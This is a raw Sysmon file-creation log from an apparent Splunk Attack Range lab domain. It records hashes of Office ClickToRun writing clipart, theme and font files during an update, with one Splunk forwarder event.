Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0152690.WMFMD5=8A82113F56A8BB049D2B70E0889127A9,SHA256=D50AC0D1CADEE997F9EF3B63CB410754227994C5FF3B1D855E6FF4898F976F15,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065797Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.002{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0152688.WMFMD5=87CE5FE138C3AE2263ED015A9B1FEE20,SHA256=552393A2A19DEB6F57F41ADF8FCB5F07505AED1528C9C9EF26AEF7A472480C97,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065796Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.002{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0152628.WMFMD5=17D4FF5B795D13AD9A960ABE657E6F42,SHA256=C7C7067D8083A091DC2F52C3A0EA795947A9CD7CDD90F418A6001C8A9B4E432E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065795Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.002{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0152626.WMFMD5=43383816B32F56DC951701E3F32A4477,SHA256=9C894AC1ED2A79BD83D13D3126AF231CD1304A69CE58DA1212411131416DF627,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065794Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0152622.WMFMD5=07BB307F47FC6217C265536737EF2A10,SHA256=21BB274A4DB6052216E1E6FAF5C54A6010C2303CC9DDEBD2980CB95ED9ECBA4D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065793Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0152610.WMFMD5=3BB2FC78F13ADFAF53D7CBB265CD4E45,SHA256=5E737550B0695C8549FC402DBB3AEE90408729318D537CE4F3571A8E8CB103F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065792Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0152608.WMFMD5=5B8484DA5EA40892E60D0A77AC4056C0,SHA256=661E1B3E2AD012EAA460EFFFFAD3171F3ACEDCDF188493A4200A22F5EE46A369,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049716Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:09.440{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DBB379D97D1B20F275CD1554D2C8671D,SHA256=D24087ADE6BFD7A2787E03BF897ADEDCF114095CB6EDB21D11D945225C5A55A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066887Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Document Themes 16\Office Theme.thmxMD5=82A1D813419E2C9F8745C6BDF7FDA9DB,SHA256=A8D4016EA143FCA5C3E5EF5E1C2C3116A971F6C4BF736B56FA9142352898882E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066886Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Document Themes 16\Ion.thmxMD5=EE05203576F8F268CE558BA73F5BDFF5,SHA256=53D01AD9850E60110718ECF3FDB661FB4A67AC19A67345D52B83112F6CBF1C3D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066885Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.877{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Document Themes 16\Ion Boardroom.thmxMD5=BBDA6B092206019EF60EF8FCECB3D53D,SHA256=F286164675AB9C83F72A4E8CB39218F9A6421EBE58A2D2C86532AEDA3725354A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066884Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Document Themes 16\Integral.thmxMD5=AD1C52DB4C29726B3A2D28DDA1110F76,SHA256=7973C1386416C251569ACC3CDBFE04DA848262A9A2DA998F915E000BFD6B52B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066883Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.814{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Document Themes 16\Gallery.thmxMD5=EC5EA899CEE6C7769EE14C36DDFA59DC,SHA256=064847F763EECAEE610A3B524A12D2199A0715838EDA59EC6AC627FF8968CAEE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066882Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Document Themes 16\Facet.thmxMD5=8EBD58005DAF9C4EC15AC2530D3A4A30,SHA256=D3AB94FDC32B10903AD444F6F3518F93C3D7348FB945168DD8140C74BB7D7E26,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066881Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Document Themes 16\Theme Fonts\Tw Cen MT.xmlMD5=CE569DF98F0BE86481FA817B9F2B4328,SHA256=B7DD4B4032E294648F3A0A8E50CEF1271218A37C25E4C992431AFA43D22177B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066880Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Document Themes 16\Theme Fonts\Tw Cen MT-Rockwell.xmlMD5=6D04B897B4FC66E87E137C535782884D,SHA256=F164A2A668A8ED20FB216AB64F0A4E9808B4BBD0190C6BD21E495BE0F959E08F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066879Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Document Themes 16\Theme Fonts\TrebuchetMs.xmlMD5=95A7E7E8B3C35B6C36130676533E8D45,SHA256=92847066DBB3DB5A55F90C9785E0FF64CE9FE26BDC5866F1D222C182786F5789,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066878Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Document Themes 16\Theme Fonts\Times New Roman-Arial.xmlMD5=5460AA7714EF9F10A170C365BDF5C18B,SHA256=54A6403951D3FC4873E767E70684B5E6B35E1B97738150D1A2470A4E2CFADD8C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066877Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Document Themes 16\Theme Fonts\Office 2007 - 2010.xmlMD5=463605A416FE8DEE021247B14C8ABA62,SHA256=83AFCF532050C7CB935B71C907DF2BBFD17B9E103331A7F95085610403CA3FC1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066876Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Document Themes 16\Theme Fonts\Gill Sans MT.xmlMD5=AB15D2B522F964C4B9F1CFAA5DC997E0,SHA256=5A0C6A1BC377D9B5958CF2DCA0D24489C82280D232A4268F83224DE246D9A29D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066875Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Document Themes 16\Theme Fonts\Georgia.xmlMD5=C4453157CAF25B9E47CBB3FFD945A31F,SHA256=4B3B493573F242950D104957E2AF50FBEA73855285078DF29FCD308C8CF7F706,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066874Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Document Themes 16\Theme Fonts\Garamond.xmlMD5=B5164034ABA24AA08B73D76286ACA3B2,SHA256=C3C87A25970029FFE268696543BD10CCF8155E5A66253F936E6B8C1E59CA3D57,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066873Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Document Themes 16\Theme Fonts\Garamond-TrebuchetMs.xmlMD5=3D5832F3AFACF334BFD7CA80241D3942,SHA256=27D0151EEE65CAF1D4B13892965C91044228542F6F5562389C85E3BCE800FC3C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066872Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Document Themes 16\Theme Fonts\Franklin Gothic.xmlMD5=D3B8A0C15819F1473431B8F2695848EA,SHA256=595A482676AD85C7D2C14C2671F2F1345FC6D4DEFE0BCCBB2ABB571694A11050,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066871Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Document Themes 16\Theme Fonts\Corbel.xmlMD5=0754AF531FE21C464E91580514B1EF9D,SHA256=63DCA3A2A64F37A4D7AE8314D72E5F9028DCCCBECDC451758C7C6A6B4C4A7AE2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066870Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Document Themes 16\Theme Fonts\Constantia-Franklin Gothic Book.xmlMD5=92FA9BC1DCA91990FB77A8F522D38647,SHA256=0E6438BDEED1D24B6E72CA7564E15994E08CDB48094ABDF840335BCD6BCA0356,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066869Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Document Themes 16\Theme Fonts\Consolas-Verdana.xmlMD5=037FB60CEDDAF7609EB705C34C17FD63,SHA256=EFDAE60C2C05C11FC73D29A190E544CED449E212D8A7A24ED6F5470339599879,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066868Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Document Themes 16\Theme Fonts\Century Schoolbook.xmlMD5=CFCE6DD2B8BAEBF235AC0740089464DA,SHA256=91953F57064F46F7484AB3360204404C4BEC5C5875AD1E3C5CD2843670F46C54,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066867Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Document Themes 16\Theme Fonts\Century Gothic.xmlMD5=22FB14F36358B58DB85AB25BA76A0BE4,SHA256=BDF30D47A114656078371BC55BA5C51D59CD681A1D7010CD134458D1EB8B5133,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066866Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Document Themes 16\Theme Fonts\Century Gothic-Palatino Linotype.xmlMD5=65F03CC5FA23AE7EE8C6859364D698BA,SHA256=32D0D481EF784B4A3B70B721A1552CD52AF9A511CFF05D90EEB191518AFDE90A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066865Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Document Themes 16\Theme Fonts\Candara.xmlMD5=17E50BDF2340FC9CE7E45467904033C4,SHA256=C671E4084A4DC7708763ED2DD706754FB024349E0D8832DFD2C15AA32DF0D969,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066864Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Document Themes 16\Theme Fonts\Cambria.xmlMD5=954972942A63ADE650D93F36A541BDDD,SHA256=96B67FA3024C6FAEA7EAEA299329EB6AFDE2A6289DBD12AE627079F87EBA1DDA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066863Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Document Themes 16\Theme Fonts\Calibri.xmlMD5=992D5D2024F4978C227D9AC610269788,SHA256=679ECEDE45B2B98D570FCB4620FF55D4C8B86E859E86989D42B87A625C61EB61,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066862Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Document Themes 16\Theme Fonts\Calibri-Cambria.xmlMD5=F6E8A52AF0C75441DFD9773650C53DF0,SHA256=A5E556327E6365455431F31A42E52CB2EFF80A4FC4A834F4FBAA0CAED89F4B64,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066861Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Document Themes 16\Theme Fonts\Calibri Light-Constantia.xmlMD5=23BE801890BFD5DD1FBD678DFEF62906,SHA256=4AB549AC96DABF448719420ECC8368D21BEF4067EC8D7EDC2D163B1615FC30A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066860Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Document Themes 16\Theme Fonts\Arial.xmlMD5=6DEAE140E327527FB3950C28568B843F,SHA256=21A0360D7296112164F046BA5B90333CC815FD957D1AE8B398A64DEDD69A1780,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066859Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Document Themes 16\Theme Fonts\Arial-Times New Roman.xmlMD5=5E0DE1EA5BFF6A1E73BEFBAF834DB8E6,SHA256=26FA6848AA2B6E85D9CA3DD0389C9B3F5AC9F202092BFE81BB5BB983E5515CC4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066858Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Document Themes 16\Theme Fonts\Arial Black-Arial.xmlMD5=69DAC39F23E9CB71D0CE94CBED668FE9,SHA256=23F6610F341705A0BA4FD155611F3984FDD0FF4CD035BE9ECAAC71EDB1D41CA9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066857Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Document Themes 16\Theme Effects\Top Shadow.eftxMD5=E4C46F946CE9A4ADF78341885965A405,SHA256=629FC4F95EDF719B83383D38676CFB0EDFA2ABE3EA5F80FEF1FBCE138387E284,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066856Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Document Themes 16\Theme Effects\Subtle Solids.eftxMD5=AB3938F09FECF057B3B4218A4FF4CE11,SHA256=604407B62F5EE72EDD7DDB67D8157EEA807878D1BF103E6B872104083D00E5A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066855Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.752{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Document Themes 16\Theme Effects\Smokey Glass.eftxMD5=F00888AF1166B0FCA74B2FA41FBB4196,SHA256=411B88486B9F750091C8284F5906607E8344ECD4873F5F6D248984C9A6C02781,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066854Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.752{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Document Themes 16\Theme Effects\Riblet.eftxMD5=FD6F59001B7059475EDCFE00E98ADBEF,SHA256=F20E43C89052884837D6097BBE1D53987C05CD3037FC4DB07FE94FA968A2EB14,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066853Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.752{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Document Themes 16\Theme Effects\Reflection.eftxMD5=073466386D7A9C72AE25539FDECE221E,SHA256=0649A8575E7289D5DDECE8CC8FB0837BC81E96C9B42724678C77192D17A8A3CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066852Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.752{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Document Themes 16\Theme Effects\Office 2007 - 2010.eftxMD5=1CF5C03679EBD87D8BA4D47DCE1AD615,SHA256=6241021CAB54627A4161B7ED18BD20A0575FDA6760169F7C90FD38C8FE0ECDC3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066851Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.752{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Document Themes 16\Theme Effects\Milk Glass.eftxMD5=721B692AB0B107CDAF947D0A84EB5CBF,SHA256=5AF25B93A06F0F0BD3A857367FE651583A41A45928BB490488C518F307ADB54C,IMPHASH=00000000000000000000000000000000falsetrue 